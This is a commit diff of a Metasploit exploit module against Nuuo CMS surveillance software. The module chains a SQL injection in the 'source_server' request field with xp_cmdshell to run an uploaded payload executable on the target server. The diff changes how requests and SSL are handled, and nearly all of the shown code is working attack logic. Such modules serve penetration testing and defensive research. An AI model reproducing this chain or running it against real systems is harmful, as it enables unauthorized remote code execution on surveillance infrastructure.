parent
5686319271
commit
0174d1dd7e
|
@ -57,13 +57,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
def inject_sql(sql, final = false)
|
||||
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
if final
|
||||
nucs_send_msg_async(sql)
|
||||
else
|
||||
nucs_send_msg(sql)
|
||||
end
|
||||
def inject_sql(sql)
|
||||
res = ncs_send_request({
|
||||
'method' => 'GETOPENALARM',
|
||||
'user_session' => user_session,
|
||||
'device_id' => "#{rand_text_numeric(4)}",
|
||||
'source_server' => "';#{sql};-- ",
|
||||
'last_one' => "#{rand_text_numeric(4)}"
|
||||
})
|
||||
end
|
||||
|
||||
# Handle incoming requests from the server
|
||||
|
@ -78,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rex.sleep(3)
|
||||
|
||||
print_status('Executing shell...')
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))
|
||||
register_file_for_cleanup("c:/windows/temp/#{@filename}")
|
||||
end
|
||||
|
||||
|
@ -112,24 +113,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
nucs_login
|
||||
|
||||
unless @nucs_session
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
|
||||
end
|
||||
connect
|
||||
ncs_login
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session
|
||||
|
||||
@pl = generate_payload_exe
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
ssl_restore = true
|
||||
ssl = datastore['SSL']
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) {super}
|
||||
rescue Timeout::Error
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
datastore['SSL'] = ssl
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue